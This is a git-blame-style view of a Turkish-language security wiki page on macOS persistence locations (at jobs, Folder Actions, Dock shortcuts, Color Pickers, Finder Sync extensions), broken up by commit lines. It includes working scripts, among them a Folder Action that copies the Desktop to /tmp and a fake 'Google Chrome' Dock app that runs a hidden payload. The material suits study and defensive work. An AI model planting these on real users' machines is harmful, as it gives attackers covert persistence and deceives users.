											
										
										
											2023-09-28 20:05:35 +00:00
+								```bash
 								sudo launchctl load -F /System/Library/LaunchDaemons/com.apple.atrun.plist
 								```
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Bu, 1 saat içinde bir dosya oluşturacaktır:
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								```bash
 								echo "echo 11 > /tmp/at.txt" | at now+1
 								```
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								İş kuyruğunu `atq` kullanarak kontrol edin:
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								```shell-session
 								sh-3.2# atq
 	Tue Apr 27 00:46:00 2021
 	Wed Apr 28 00:29:00 2021
 								```
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Yukarıda iki zamanlanmış iş görebiliriz. İşin detaylarını `at -c İŞNUMARASI` kullanarak yazdırabiliriz.
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								```shell-session
 								sh-3.2# at -c 26
 								#!/bin/sh
 								# atrun uid=0 gid=0
 								# mail csaby 0
 								umask 22
 								SHELL=/bin/sh; export SHELL
 								TERM=xterm-256color; export TERM
 								USER=root; export USER
 								SUDO_USER=csaby; export SUDO_USER
 								SUDO_UID=501; export SUDO_UID
 								SSH_AUTH_SOCK=/private/tmp/com.apple.launchd.co51iLHIjf/Listeners; export SSH_AUTH_SOCK
 								__CF_USER_TEXT_ENCODING=0x0:0:0; export __CF_USER_TEXT_ENCODING
 								MAIL=/var/mail/root; export MAIL
 								PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin; export PATH
 								PWD=/Users/csaby; export PWD
 								SHLVL=1; export SHLVL
 								SUDO_COMMAND=/usr/bin/su; export SUDO_COMMAND
 								HOME=/var/root; export HOME
 								LOGNAME=root; export LOGNAME
 								LC_CTYPE=UTF-8; export LC_CTYPE
 								SUDO_GID=20; export SUDO_GID
 								_=/usr/bin/at; export _
 								cd /Users/csaby || {
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								echo 'Execution directory inaccessible' >&2
 								exit 1
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								}
 								unset OLDPWD
 								echo 11 > /tmp/at.txt
 								```
 								{% hint style="warning" %}
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								Eğer AT görevleri etkin değilse, oluşturulan görevler yürütülmeyecektir.
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								{% endhint %}
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								**İş dosyaları** `/private/var/at/jobs/` dizininde bulunabilir.
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								```
 								sh-3.2# ls -l /private/var/at/jobs/
 								total 32
 								-rw-r--r--  1 root  wheel    6 Apr 27 00:46 .SEQ
 								-rw-------  1 root  wheel    0 Apr 26 23:17 .lockfile
 								-r--------  1 root  wheel  803 Apr 27 00:46 a00019019bdcd2
 								-rwx------  1 root  wheel  803 Apr 27 00:46 a0001a019bdcd2
 								```
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Dosya adı sırayı, iş numarasını ve çalışma zamanını içerir. Örneğin `a0001a019bdcd2`'ye bakalım.
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* `a` - bu kuyruktur
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* `0001a` - onaltılık iş numarası, `0x1a = 26`
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* `019bdcd2` - onaltılık zaman. Bu, epoch'tan bu yana geçen dakikaları temsil eder. `0x019bdcd2`, ondalık olarak `26991826`'dır. 60 ile çarptığımızda `1619509560` elde ederiz, bu da `GMT: 2021 Nisan 27, Salı 7:46:00`'yi temsil eder.
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								İş dosyasını yazdırırsak, `at -c` kullanarak elde ettiğimiz bilgileri içerdiğini görürüz.
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								### Klasör Eylemleri
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Açıklama: [https://theevilbit.github.io/beyond/beyond\_0024/](https://theevilbit.github.io/beyond/beyond\_0024/)\
 								Açıklama: [https://posts.specterops.io/folder-actions-for-persistence-on-macos-8923f222343d](https://posts.specterops.io/folder-actions-for-persistence-on-macos-8923f222343d)
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* Kum havuzunu atlamak için kullanışlı: [✅](https://emojipedia.org/check-mark-button)
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* Ancak **`System Events`** ile iletişim kurabilmek için `osascript`'i argümanlarla çağırabilmeniz gerekir.
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* TCC atlatma: [🟠](https://emojipedia.org/large-orange-circle)
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* Masaüstü, Belgeler ve İndirmeler gibi bazı temel TCC izinlerine sahiptir
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Konum
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								* **`/Library/Scripts/Folder Action Scripts`**
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* Kök izni gereklidir
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* **Tetikleyici**: Belirtilen klasöre erişim
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								* **`~/Library/Scripts/Folder Action Scripts`**
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* **Tetikleyici**: Belirtilen klasöre erişim
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Açıklama ve Sömürü
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Klasör Eylemleri, bir klasördeki değişikliklerle otomatik olarak tetiklenen betiklerdir; öğeler eklenirken, kaldırılırken veya diğer eylemler gerçekleşirken veya klasör penceresinin açılması veya yeniden boyutlandırılması gibi diğer eylemlerle tetiklenirler. Bu eylemler çeşitli görevler için kullanılabilir ve Finder UI veya terminal komutları kullanılarak tetiklenebilirler.
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								Klasör Eylemleri kurmak için şu seçeneklere sahipsiniz:
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+. [Automator](https://support.apple.com/guide/automator/welcome/mac) ile bir Klasör Eylemi iş akışı oluşturup bir hizmet olarak yüklemek.
 . Bir betiği manuel olarak bir klasörün bağlam menüsündeki Klasör Eylemleri Kurulumu aracılığıyla eklemek.
 . Programatik olarak bir Klasör Eylemi kurmak için `System Events.app`'e Apple Olayı iletileri göndermek için OSAScript'i kullanmak.
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* Bu yöntem, eylemi sisteme gömmek ve kalıcılık düzeyi sunmak için özellikle kullanışlıdır.
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Aşağıdaki betik, bir Klasör Eylemi tarafından yürütülebilecek bir örnektir:
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								```applescript
-												a

											
										
										
											2024-02-07 04:06:18 +00:00
+								// source.js
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								var app = Application.currentApplication();
 								app.includeStandardAdditions = true;
 								app.doShellScript("touch /tmp/folderaction.txt");
 								app.doShellScript("touch ~/Desktop/folderaction.txt");
 								app.doShellScript("mkdir /tmp/asd123");
 								app.doShellScript("cp -R ~/Desktop /tmp/asd123");
 								```
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Yukarıdaki betiği Klasör Eylemleri tarafından kullanılabilir hale getirmek için şunu kullanarak derleyin:
-												a

											
										
										
											2024-02-07 04:06:18 +00:00
+								```bash
 								osacompile -l JavaScript -o folder.scpt source.js
 								```
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Derlemesi yapıldıktan sonra, aşağıdaki betiği çalıştırarak Klasör İşlemlerini ayarlayın. Bu betik, Klasör İşlemlerini genel olarak etkinleştirecek ve önceden derlenmiş betiği özel olarak Masaüstü klasörüne ekleyecektir.
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								```javascript
-												a

											
										
										
											2024-02-07 04:06:18 +00:00
+								// Enabling and attaching Folder Action
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								var se = Application("System Events");
 								se.folderActionsEnabled = true;
 								var myScript = se.Script({name: "source.js", posixPath: "/tmp/source.js"});
 								var fa = se.FolderAction({name: "Desktop", path: "/Users/username/Desktop"});
 								se.folderActions.push(fa);
 								fa.scripts.push(myScript);
 								```
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Ayar dosyasını şu şekilde çalıştırın:
-												a

											
										
										
											2024-02-07 04:06:18 +00:00
+								```bash
 								osascript -l JavaScript /Users/username/attach.scpt
 								```
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* Bu kalıcılığı GUI aracılığıyla uygulamanın yolu:
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Bu, yürütülecek olan betiktir:
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
 								{% code title="source.js" %}
 								```applescript
 								var app = Application.currentApplication();
 								app.includeStandardAdditions = true;
 								app.doShellScript("touch /tmp/folderaction.txt");
 								app.doShellScript("touch ~/Desktop/folderaction.txt");
 								app.doShellScript("mkdir /tmp/asd123");
 								app.doShellScript("cp -R ~/Desktop /tmp/asd123");
 								```
 								{% endcode %}
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Aşağıdaki komutla derleyin: `osacompile -l JavaScript -o folder.scpt source.js`
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Taşıyın:
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								```bash
 								mkdir -p "$HOME/Library/Scripts/Folder Action Scripts"
 								mv /tmp/folder.scpt "$HOME/Library/Scripts/Folder Action Scripts"
 								```
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Ardından, `Folder Actions Setup` uygulamasını açın, **izlemek istediğiniz klasörü seçin** ve durumunuzda **`folder.scpt`**'yi seçin (benim durumumda ona output2.scp adını verdim):
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								<figure><img src="../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1).png" alt="" width="297"><figcaption></figcaption></figure>
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Şimdi, eğer o klasörü **Finder** ile açarsanız, betiğiniz çalıştırılacaktır.
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								Bu yapılandırma, base64 formatında **`~/Library/Preferences/com.apple.FolderActionsDispatcher.plist`** konumunda saklanmıştır.
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								Şimdi, GUI erişimi olmadan bu kalıcılığı hazırlamayı deneyelim:
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+. **`~/Library/Preferences/com.apple.FolderActionsDispatcher.plist`**'yi yedeklemek için `/tmp`'ye kopyalayın:
 								* `cp ~/Library/Preferences/com.apple.FolderActionsDispatcher.plist /tmp`
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+. Şimdi, ayarladığınız Klasör Eylemlerini **kaldırın**:
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								<figure><img src="../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Şimdi boş bir ortama sahip olduğumuza göre
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+. Yedek dosyasını kopyalayın: `cp /tmp/com.apple.FolderActionsDispatcher.plist ~/Library/Preferences/`
 . Bu yapılandırmayı tüketmek için Folder Actions Setup.app'ı açın: `open "/System/Library/CoreServices/Applications/Folder Actions Setup.app/"`
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
 								{% hint style="danger" %}
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Ve bu benim için çalışmadı, ama bunlar yazıdan talimatlar:(
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								{% endhint %}
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								### Dock kısayolları
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								Yazı: [https://theevilbit.github.io/beyond/beyond\_0027/](https://theevilbit.github.io/beyond/beyond\_0027/)
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* Kum havuzunu atlamak için kullanışlı: [✅](https://emojipedia.org/check-mark-button)
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								* Ancak, sisteme kötü amaçlı bir uygulama yüklemiş olmanız gerekmektedir
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* TCC atlatma: [🔴](https://emojipedia.org/large-red-circle)
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Konum
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
 								* `~/Library/Preferences/com.apple.dock.plist`
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* **Tetikleyici**: Kullanıcı dock içindeki uygulamaya tıkladığında
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Açıklama ve Sömürü
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Dock'ta görünen tüm uygulamalar, plist içinde belirtilmiştir: **`~/Library/Preferences/com.apple.dock.plist`**
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Sadece şu şekilde bir uygulama **eklemek mümkündür**:
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
 								{% code overflow="wrap" %}
 								```bash
 								# Add /System/Applications/Books.app
 								defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/System/Applications/Books.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'
 								# Restart Dock
 								killall Dock
 								```
 								{% endcode %}
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Bazı **sosyal mühendislik** kullanarak, örneğin Dock içinde **Google Chrome gibi taklit edebilir** ve aslında kendi betiğinizi çalıştırabilirsiniz:
-												GITBOOK-4102: change request with no subject merged in GitBook

											
										
										
											2023-09-28 21:12:41 +00:00
+								```bash
 								#!/bin/sh
 								# THIS REQUIRES GOOGLE CHROME TO BE INSTALLED (TO COPY THE ICON)
 								rm -rf /tmp/Google\ Chrome.app/ 2>/dev/null
 								# Create App structure
 								mkdir -p /tmp/Google\ Chrome.app/Contents/MacOS
 								mkdir -p /tmp/Google\ Chrome.app/Contents/Resources
 								# Payload to execute
 								echo '#!/bin/sh
 								open /Applications/Google\ Chrome.app/ &
 								touch /tmp/ImGoogleChrome' > /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome
 								chmod +x /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome
 								# Info.plist
 								cat << EOF > /tmp/Google\ Chrome.app/Contents/Info.plist
 								<?xml version="1.0" encoding="UTF-8"?>
 								<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
 								"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
 								<plist version="1.0">
 								<dict>
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								<key>CFBundleExecutable</key>
 								<string>Google Chrome</string>
 								<key>CFBundleIdentifier</key>
 								<string>com.google.Chrome</string>
 								<key>CFBundleName</key>
 								<string>Google Chrome</string>
 								<key>CFBundleVersion</key>
 								<string>1.0</string>
 								<key>CFBundleShortVersionString</key>
 								<string>1.0</string>
 								<key>CFBundleInfoDictionaryVersion</key>
 								<string>6.0</string>
 								<key>CFBundlePackageType</key>
 								<string>APPL</string>
 								<key>CFBundleIconFile</key>
 								<string>app</string>
-												GITBOOK-4102: change request with no subject merged in GitBook

											
										
										
											2023-09-28 21:12:41 +00:00
+								</dict>
 								</plist>
 								EOF
 								# Copy icon from Google Chrome
 								cp /Applications/Google\ Chrome.app/Contents/Resources/app.icns /tmp/Google\ Chrome.app/Contents/Resources/app.icns
 								# Add to Dock
 								defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Google Chrome.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'
 								killall Dock
 								```
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								### Renk Seçiciler
-												GITBOOK-4102: change request with no subject merged in GitBook

											
										
										
											2023-09-28 21:12:41 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Açıklama: [https://theevilbit.github.io/beyond/beyond\_0017](https://theevilbit.github.io/beyond/beyond\_0017/)
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* Kum havuzunu atlamak için kullanışlı: [🟠](https://emojipedia.org/large-orange-circle)
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								* Çok belirli bir eylem gerçekleşmesi gerekiyor
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* Başka bir kum havuzunda sonlanacaksınız
 								* TCC atlatma: [🔴](https://emojipedia.org/large-red-circle)
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Konum
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												GITBOOK-4230: change request with no subject merged in GitBook

											
										
										
											2024-01-10 00:59:55 +00:00
+								* `/Library/ColorPickers`
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* Kök erişimi gereklidir
 								* Tetikleyici: Renk seçicisini kullanın
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								* `~/Library/ColorPickers`
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* Tetikleyici: Renk seçicisini kullanın
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Açıklama ve Sömürü
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Kodunuzla birlikte bir renk seçici paketini derleyin (örneğin [**bu örneği kullanabilirsiniz**](https://github.com/viktorstrate/color-picker-plus)) ve bir yapılandırıcı ekleyin (benzer şekilde [Ekran Koruyucu bölümünde](macos-auto-start-locations.md#screen-saver) olduğu gibi) ve paketi `~/Library/ColorPickers` dizinine kopyalayın.
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Sonra, renk seçicisi tetiklendiğinde sizin de tetiklenmeniz gerekmektedir.
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								Kütüphanenizi yükleyen ikili dosyanın **çok kısıtlayıcı bir kum havuzu** olduğunu unutmayın: `/System/Library/Frameworks/AppKit.framework/Versions/C/XPCServices/LegacyExternalColorPickerService-x86_64.xpc/Contents/MacOS/LegacyExternalColorPickerService-x86_64`
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
 								{% code overflow="wrap" %}
 								```bash
 								[Key] com.apple.security.temporary-exception.sbpl
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								[Value]
 								[Array]
 								[String] (deny file-write* (home-subpath "/Library/Colors"))
 								[String] (allow file-read* process-exec file-map-executable (home-subpath "/Library/ColorPickers"))
 								[String] (allow file-read* (extension "com.apple.app-sandbox.read"))
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
+								```
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								{% endcode %}
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								### Finder Senkronizasyon Eklentileri
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								**Açıklama**: [https://theevilbit.github.io/beyond/beyond\_0026/](https://theevilbit.github.io/beyond/beyond\_0026/)\
 								**Açıklama**: [https://objective-see.org/blog/blog\_0x11.html](https://objective-see.org/blog/blog\_0x11.html)
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								* Kum havuzunu atlamak için kullanışlı mı: **Hayır, çünkü kendi uygulamanızı çalıştırmanız gerekir**
 								* TCC atlaması: ???
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Konum
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* Belirli bir uygulama
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								#### Açıklama ve Sızma
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Bir Finder Senkronizasyon Uzantısı örneği içeren bir uygulama [**burada bulunabilir**](https://github.com/D00MFist/InSync).
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Uygulamalar `Finder Senkronizasyon Uzantıları`na sahip olabilir. Bu uzantı, çalıştırılacak bir uygulamanın içine gidecektir. Dahası, uzantının kodunu çalıştırabilmesi için **bazı geçerli Apple geliştirici sertifikalarıyla imzalanmış olması gerekir**, **kum havuzunda olmalıdır** (rahatlatılmış istisnalar eklenmiş olabilir) ve şuna benzer bir şeyle kaydedilmiş olmalıdır:
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
+								```bash
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								pluginkit -a /Applications/FindIt.app/Contents/PlugIns/FindItSync.appex
 								pluginkit -e use -i com.example.InSync.InSync
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
+								```
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								### Ekran Koruyucu
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Açıklama: [https://theevilbit.github.io/beyond/beyond\_0016/](https://theevilbit.github.io/beyond/beyond\_0016/)\
